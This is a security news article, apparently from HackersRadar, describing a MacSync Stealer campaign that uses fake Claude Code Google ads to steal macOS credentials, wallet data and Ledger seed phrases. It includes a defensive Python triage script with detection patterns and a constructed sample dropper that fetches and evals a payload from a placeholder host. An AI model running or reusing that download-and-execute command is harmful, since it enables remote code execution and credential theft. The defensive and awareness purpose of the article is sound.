Weaponized Google Ads Install Malicious Claude Code to Hijack macOS
Key Takeaways
- A sophisticated “MacSync Stealer” campaign is targeting macOS users via weaponized Google Ads promoting a fake Anthropic Claude Code CLI.
- The malware harvests a wide array of credentials, including macOS login passwords, browser data, cryptocurrency wallet details, and developer secrets.
- It also persistently compromises Ledger Live and Ledger Wallet apps by replacing their legitimate code with malicious versions designed to phish seed phrases.
- The attack leverages social engineering and exploits the trusted nature of Google services to bypass automated security measures.
- A design flaw in the malware’s execution provides a narrow window for victims to interrupt the attack chain and prevent data exfiltration and wallet compromise.
Cybersecurity researchers have uncovered an active campaign leveraging deceptive Google advertisements to distribute “MacSync Stealer,” a potent macOS credential harvesting malware. This threat specifically targets developers and cryptocurrency holders by impersonating Anthropic’s Claude Code command-line interface, ultimately aiming to steal sensitive data and hijack hardware wallet applications.
The campaign, meticulously reverse-engineered by analysts at Beelzebub Labs using their Caronte threat-intel platform, came to light after a suspicious terminal command was submitted for analysis. Their findings reveal a multi-stage attack designed to appear legitimate while silently compromising user systems.
The Deceptive Lure: Weaponized Google Ads
The initial vector for this attack is a sponsored Google ad. When users searched for terms like “claude code mac install,” a malicious advertisement titled “Install Claude macOS” appeared, often ranking above the official Anthropic listing. This prime placement lends an air of legitimacy, encouraging unsuspecting users to click.
Clicking the sponsored ad redirects victims to a meticulously crafted fake installation page hosted on Google Sites. This page mimics Anthropic’s official branding, complete with a fabricated “12M+ downloads” counter and a prominent “one-click copy” button for a malicious terminal command.
The choice of Google Sites as a hosting platform is a strategic move by the attackers. Google Sites renders content using JavaScript. This means automated security scanners and corporate proxies that fetch pages without executing JavaScript will only see an empty shell, often marking the link as safe. However, a human user’s browser executes the script, loading the full, convincing fake page. This, combined with the trusted sites.google.com domain, which is typically on most allowlists, creates a highly effective lure that evades automated detection while appearing legitimate to real users.
Adding another layer of social engineering, the fake page includes a “New to Terminal?” walkthrough for less experienced users. This guide features a simulated installation animation that explicitly displays “Write admin password: **** ✓.” This seemingly innocuous step is a deliberate tactic to prime victims, teaching them that entering an administrator password is a normal and expected part of the Claude Code installation process. Consequently, when a fake password dialog appears later in the attack, victims are less likely to be suspicious, believing they are simply following the instructions they were just given.
The Attack Chain: From Ad Click to Wallet Hijack
The compromise unfolds as a six-stage process that moves from an initial ad click to comprehensive credential theft and, for cryptocurrency users, a persistent hardware wallet hijack.
- Sponsored Google Ad: A paid search result masquerades as the legitimate Claude Code CLI for developer-centric search queries.
- Fake Install Page: A Google Sites page, designed to closely resemble Anthropic’s official website, hosts a pre-loaded malicious terminal command.
- Terminal Command: The victim pastes a Base64-encoded command, initiating a three-stage zsh dropper.
- Fake Password Dialog: A convincing System Preferences-style popup appears, designed to steal the user’s macOS login password.
- Credential Harvest: The stolen password is used to unlock keychains, browsers, wallet extensions, and developer credentials for exfiltration.
- Ledger App Trojan: If a Ledger hardware wallet application is present, its code is silently replaced with a malicious version to phish seed phrases on subsequent launches.
Because each stage depends on the one before it, the entire chain can be disrupted at any point. Crucially, as detailed below, victims who reboot or close their laptops before certain blocking steps complete bypass the credential archiving and wallet trojan stages entirely.
Stage One: The Covert Dropper
The initial Base64-encoded command, once decoded, executes a simple curl-and-execute chain. This silently downloads a file, often named after the malware’s hash and tagged with .daily, suggesting a rotating payload. The downloaded file contains an inline script that is base64-encoded and gzip-compressed, which is executed using eval. The attackers employ basic obfuscation techniques, randomizing variable names and payload identifiers with each build to circumvent simple antivirus string matching.
The final decoded script operates completely silently, redirecting all output away from the terminal. Its primary functions are to fetch and execute the core credential-stealing payload and, subsequently, to upload the harvested data to the attacker’s server in smaller chunks.
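The layered dropper described above, and the later advice to treat any encoded or obfuscated install command as a red flag, both call for the same defensive tool: something that peels the layers off a pasted one-liner before anyone runs it. The Python triage helper below is an added example, not the campaign's code and not Beelzebub Labs' Caronte tooling. It decodes nested base64 and gzip blobs and reports the download-and-execute constructs the article describes (curl, eval, base64 -d, gunzip, output redirected to /dev/null, a .daily payload name). The sample command, the example.invalid host and the abc123.daily filename are constructed for the demonstration; the benign comparison command is the vendor's documented npm install line.

```python
"""Triage helper for copy-pasted install commands (added example; not the
campaign's code or Beelzebub Labs' tooling).  Peels base64 / gzip layers off
a one-liner and flags the download-and-execute constructs a dropper uses."""
import base64
import binascii
import gzip
import re
import zlib

# Constructs a defender wants surfaced before a pasted "installer" is run.
INDICATORS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "eval": re.compile(r"\beval\b"),
    "base64_decode": re.compile(r"base64\s+(-d|--decode|-D)\b"),
    "gunzip": re.compile(r"\b(gunzip|zcat|gzip\s+-d)\b"),
    "output_silenced": re.compile(r">\s*/dev/null\s+2>&1|&>\s*/dev/null"),
    "daily_payload": re.compile(r"\.daily\b"),  # rotating-payload suffix from the article
}

# Runs long enough that ordinary flags and words rarely look like base64.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def try_decode_layer(blob: str):
    """Decode one base64 (optionally gzip-compressed) layer to text, or None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (ValueError, binascii.Error):
        return None
    if raw[:2] == b"\x1f\x8b":  # gzip magic bytes
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError, zlib.error):
            return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    # A script layer is printable text; random bytes that happen to be valid
    # base64 (e.g. a hex hash) are not, so reject control characters.
    if any(ord(c) < 32 and c not in "\n\r\t" for c in text):
        return None
    return text


def unwrap(command: str, max_layers: int = 5) -> list:
    """Recursively decode embedded blobs; returns every layer, outermost first."""
    layers = [command]
    current = command
    for _ in range(max_layers):
        decoded = [t for m in B64_BLOB.finditer(current)
                   if (t := try_decode_layer(m.group(0)))]
        if not decoded:
            break
        current = "\n".join(decoded)
        layers.append(current)
    return layers


def triage(command: str) -> dict:
    """Report how many layers were peeled and which indicators fired in any layer."""
    hits = set()
    layers = unwrap(command)
    for layer in layers:
        hits.update(name for name, rx in INDICATORS.items() if rx.search(layer))
    return {"layers": len(layers), "indicators": sorted(hits)}


def build_sample() -> str:
    """Constructed sample in the shape the article describes: a Base64 blob
    that, once decoded and gunzipped, fetches a '.daily' file and evals it
    with all output silenced.  The host is a reserved .invalid placeholder."""
    inner = (
        'curl -fsSL http://example.invalid/abc123.daily -o "$TMPDIR/p.daily"\n'
        'eval "$(base64 -d "$TMPDIR/p.daily" | gunzip)" > /dev/null 2>&1\n'
    )
    blob = base64.b64encode(gzip.compress(inner.encode())).decode()
    return f"echo {blob} | base64 -d | gunzip | zsh"


if __name__ == "__main__":
    for cmd in ("npm install -g @anthropic-ai/claude-code", build_sample()):
        print(triage(cmd))
```

Run it over whatever was copied to the clipboard before pasting into a terminal: a clean install command decodes to a single layer with no indicators, while the constructed dropper yields two layers and seven indicators. The point is not the exact regex list but the habit the article recommends: an installer that needs decoding before it can be read should not be run until it has been.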
Stage Two: Stealing the macOS Password
The core credential-stealing payload, written in AppleScript, identifies itself internally as “MacSync Stealer version 1.1.2, build tag ‘claude1’,” explicitly linking it to the Claude Code lure. Its first action is to force-quit Terminal, thereby erasing the malicious command from the visible shell history before the victim can inspect it.
The malware then focuses on acquiring the macOS login password. It employs a cunning trick: using a built-in macOS command that validates a password without triggering any system prompt, the script silently tests whatever the victim types. It displays a fake dialog window, meticulously styled to resemble a genuine “System Preferences” prompt, complete with Apple’s authentic lock icon. The script continuously loops, waiting for the user to enter the correct password. Once validated, this password is immediately leveraged to unlock the Mac’s encrypted keychain and extract the master key protecting “Chrome Safe Storage,” the mechanism used by Chromium-based browsers to encrypt saved passwords.
Even security-conscious users who later deny the legitimate macOS keychain permission prompt are still vulnerable. The attacker will have already obtained the full keychain file and the stolen password necessary to decrypt it offline.
Stage Three: Comprehensive Data Harvesting
With the single macOS login password, the malware proceeds to systematically collect an extensive range of sensitive data. This includes saved logins from over fourteen Chromium-based browsers and several Firefox-based browsers, credentials from more than 80 cryptocurrency browser wallet extensions and over 20 desktop wallet applications, SSH keys, AWS and Kubernetes configuration files, Telegram desktop sessions, Safari history, Apple Notes, and sensitive documents (PDFs, key files, VPN configurations) located in the Desktop, Documents, and Downloads folders. All this harvested data is compressed into a single archive for exfiltration.
Trojaning Ledger Live and Ledger Wallet Applications
For users with Ledger Live or Ledger Wallet installed, the malware goes beyond simple data theft. It downloads a modified version of the app’s internal Electron code and replaces the original, then re-signs the application to prevent macOS from flagging it as damaged. This constitutes a persistent hijack: every subsequent launch of Ledger Live or Ledger Wallet will now execute the attacker’s code.
Hidden within this modified code is a single injected instruction, accompanied by a Russian-language comment meaning “insert here.” Approximately five seconds after the compromised app opens (allowing the legitimate interface to load and reassure the user), the entire window silently redirects to a fake “recovery” flow. This flow is expertly crafted using Ledger’s own official onboarding artwork, guiding the victim through a fabricated device error and prompting them to re-enter their recovery seed phrase to “fix” it. This act ultimately grants the attacker full control over the victim’s cryptocurrency wallet.
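Because the trojaned bundle is re-signed, a plain "does the app launch without a damaged warning" check says nothing; what changes when anyone other than the vendor re-signs an app is the signing identity. The check below is an added example (not Ledger's or Beelzebub Labs' code): it parses the output of Apple's `codesign -dvvv` for an app bundle and compares the TeamIdentifier and certificate chain with the vendor's expected Apple Team ID. The Team ID constant is a placeholder to be filled from a freshly downloaded official copy, and the two sample outputs are constructed in the format codesign prints, one vendor-signed and one ad-hoc re-signed.

```python
"""Code-signature identity check for an Electron app bundle such as Ledger
Live (added example; not Ledger's or Beelzebub Labs' tooling).  A bundle that
has been modified and re-signed verifies fine against its *new* signature, so
the useful question is who signed it, not whether the seal is intact."""
import subprocess

# Placeholder: replace with the vendor's real Apple Team ID, read from
# `codesign -dvvv` on an official copy downloaded from the vendor's site.
EXPECTED_TEAM_ID = "VENDOR_TEAM_ID_PLACEHOLDER"


def parse_codesign(output: str) -> dict:
    """Parse the key=value lines `codesign -dvvv` writes (to stderr)."""
    info = {"Authority": []}
    for line in output.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "Authority":          # certificate chain, leaf first
            info["Authority"].append(value)
        else:
            info[key] = value
    return info


def assess(info: dict, expected_team_id: str) -> list:
    """Return findings; an empty list means the signature looks vendor-issued."""
    findings = []
    if info.get("Signature") == "adhoc":
        findings.append("ad-hoc signature (no Developer ID)")
    team = info.get("TeamIdentifier", "not set")
    if team != expected_team_id:
        findings.append(f"TeamIdentifier {team!r} != expected {expected_team_id!r}")
    chain = info.get("Authority", [])
    if not chain or chain[-1] != "Apple Root CA":
        findings.append("certificate chain does not end at Apple Root CA")
    if not any(a.startswith("Developer ID Application:") for a in chain):
        findings.append("no Developer ID Application leaf certificate")
    return findings


def check_bundle(path: str, expected_team_id: str = EXPECTED_TEAM_ID) -> list:
    """Run codesign against a real bundle (macOS only) and assess the result."""
    proc = subprocess.run(["codesign", "-dvvv", path], capture_output=True, text=True)
    if proc.returncode != 0:
        return [f"codesign failed: {proc.stderr.strip()}"]
    return assess(parse_codesign(proc.stderr), expected_team_id)


# Constructed sample outputs in the shape codesign -dvvv prints.
SAMPLE_VENDOR = """Executable=/Applications/Example.app/Contents/MacOS/Example
Identifier=com.example.app
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
Signature size=9000
Authority=Developer ID Application: Example Vendor (VENDOR_TEAM_ID_PLACEHOLDER)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=VENDOR_TEAM_ID_PLACEHOLDER
Sealed Resources version=2 rules=13 files=200
"""

SAMPLE_RESIGNED = """Executable=/Applications/Example.app/Contents/MacOS/Example
Identifier=com.example.app
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20400 size=1234 flags=0x2(adhoc) hashes=30+7 location=embedded
Signature=adhoc
TeamIdentifier=not set
Sealed Resources version=2 rules=13 files=201
"""

if __name__ == "__main__":
    print("vendor copy:  ", assess(parse_codesign(SAMPLE_VENDOR), EXPECTED_TEAM_ID))
    print("re-signed copy:", assess(parse_codesign(SAMPLE_RESIGNED), EXPECTED_TEAM_ID))
```

On a Mac, `check_bundle("/Applications/Ledger Live.app")` does the same against the installed bundle. Note that `codesign --verify --deep --strict` passing is not evidence of an untouched app here, because the attacker's re-signing produces a self-consistent seal; the identity comparison is what exposes the swap. An attacker signing with their own Developer ID rather than ad hoc still fails the TeamIdentifier comparison.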
A Design Flaw That Benefits Victims
During their analysis, Beelzebub Labs researchers identified a significant vulnerability in the malware’s design. Both the wallet trojan and the exfiltration of stolen data are contingent upon the victim interacting with a final popup – a fake error message stating, “Your Mac does not support this application.” Due to the underlying script’s construction, the execution pauses entirely at this dialog and cannot proceed until the victim clicks through it.
This critical flaw means that any user who force-quits Terminal, closes their laptop, or restarts their Mac before clicking this final popup effectively interrupts the attack chain. This prevents any data from leaving the machine and any wallet applications from being tampered with. The temporary staging folder used by the malware is automatically wiped upon a macOS reboot. This situation presents a peculiar instance where the attacker’s own social engineering tactic – designed to make victims quietly dismiss the “error” – inadvertently provides cautious users with an escape route.
Furthermore, the data exfiltration process itself exhibits fragility. Stolen data is uploaded in small, ten-megabyte chunks over an unencrypted connection. If even a single piece fails to arrive due to factors like a dropped Wi-Fi connection, a reboot, or a firewall, the entire archive becomes unreadable to the attacker due to the internal structure of zip files.
What This Means for Developers
Beelzebub reported the malicious advertisement to Google, which promptly removed it within 24 hours for violating advertising policies. However, the operators behind this campaign are known to frequently rotate their lure URLs to evade takedowns.
The primary takeaway for developers and all macOS users is clear: always obtain command-line developer tools and any software directly from official vendor websites, never from links in search advertisements. Any copy-pasted terminal command containing encoded or obfuscated text should be treated as an immediate and serious red flag, regardless of how legitimate the surrounding web page appears.
What You Should Do
- Verify Download Sources: Always download software, especially developer tools and cryptocurrency applications, directly from the official vendor’s website. Avoid links from search ads, third-party download sites, or unverified sources.
- Scrutinize Terminal Commands: Be highly suspicious of any terminal command that is obfuscated, Base64-encoded, or otherwise appears complex and non-transparent. Understand what a command does before executing it.
- Monitor for Suspicious Pop-ups: If an unexpected password prompt or error message appears during a software installation, especially if it asks for your macOS admin password, proceed with extreme caution. Verify its legitimacy before entering any credentials.
- Reboot Your Mac: If you suspect you’ve executed a malicious command or are in the middle of a suspicious installation, immediately reboot your Mac. This can disrupt the attack chain and prevent data exfiltration or wallet compromises.
- Change Passwords: If you believe you may have fallen victim to this attack, immediately change your macOS login password, as well as any passwords saved in your browsers or used for developer services (e.g., AWS, Kubernetes, SSH).
- Check Cryptocurrency Wallets: Regularly monitor your cryptocurrency wallet balances and transaction history for any unauthorized activity. If you use Ledger Live or Ledger Wallet and suspect compromise, consider migrating funds to a new, secure wallet and reinstalling the applications from official sources.
- Enable Multi-Factor Authentication (MFA): Implement MFA wherever possible, especially for critical accounts, developer platforms, and cryptocurrency exchanges.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.